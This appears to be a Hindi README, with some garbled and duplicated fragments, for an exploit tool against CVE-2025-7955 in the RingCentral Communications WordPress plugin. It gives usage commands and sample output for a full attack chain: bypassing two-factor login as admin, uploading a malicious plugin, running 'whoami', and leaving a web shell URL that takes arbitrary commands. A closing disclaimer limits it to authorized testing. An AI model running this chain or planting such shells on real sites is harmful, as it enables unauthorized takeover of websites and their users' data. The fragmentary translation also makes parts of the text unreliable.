
RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify फ़ंक्शन के माध्यम से सर्वर-साइड सत्यापन के अभाव से प्रमाणीकरण बायपास
RingCentral Communications 1.5 - 1.6.8 - सर्वर-साइड सत्यापन की कमी के कारण ringcentral_admin_login_2fa_verify फ़ंक्शन के माध्यम से प्रमाणीकरण बाईपास
CVE: CVE-2025-7955
प्रभावित प्लगइन: RingCentral Communications (WordPress)
प्रभावित संस्करण: 1.5 – 1.6.8
CVSS स्कोर: 9.8 (गंभीर)
प्रकार: प्रमाणीकरण बाईपास (सर्वर-साइड सत्यापन की कमी)
_WordPress के लिए RingCentral Communications प्लगइन
ringcentral_admin_login_2fa_verify()फ़ंक्शन के भीतर अनुचित सत्यापन के कारण प्रमाणीकरण बाईपास की भेद्यता से ग्रस्त है। संस्करण 1.5 से 1.6.8 तक अनधिकृत हमलावरों को केवल समान फर्जी कोड प्रदान करके किसी भी उपयोगकर्ता के रूप में लॉग इन करने की अनुमति देते हैं।**
यह एक्सप्लॉइट CVE-2025-7955 के लिए संपूर्ण हमले की श्रृंखला को स्वचालित करता है। इसे निम्न के लिए डिज़ाइन किया गया है:
/wp-json/wp/v2/users/ID) के माध्यम से इसे सूचीबद्ध करने का प्रयास करेगी।whoami चलाकर कोड निष्पादन प्रदर्शित करती है और आउटपुट प्रिंट करती है।अपना दुर्भावनापूर्ण प्लगइन तैयार करें
सुनिश्चित करें कि आपकी दुर्भावनापूर्ण प्लगइन ZIP फ़ाइल (डिफ़ॉल्ट: Nxploit.zip) स्क्रिप्ट के समान निर्देशिका में है।
एक्सप्लॉइट चलाएँ:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (आवश्यक) लक्षित WordPress साइट URL-user, --username : (वैकल्पिक) जिस उपयोगकर्ता के रूप में लॉग इन करना है (छोड़ने पर स्वचालित रूप से खोजा जाता है)-id, --id_admin : (डिफ़ॉल्ट: 1) उपयोगकर्ता ID (एडमिन आमतौर पर ID 1 होता है)-z, --zip : (डिफ़ॉल्ट: Nxploit.zip) दुर्भावनापूर्ण प्लगइन ZIP का पथउदाहरण:
python3 CVE-2025-7955.py -u http://target/wordpress
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उपयोग के लिए है।
उन प्रणालियों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।
इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए लेखक कोई जिम्मेदारी नहीं लेता है।
द्वारा: Khaled Alenazi (Nxploited)
या उपयोगकर्ता नाम/ID निर्दिष्ट करें:
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1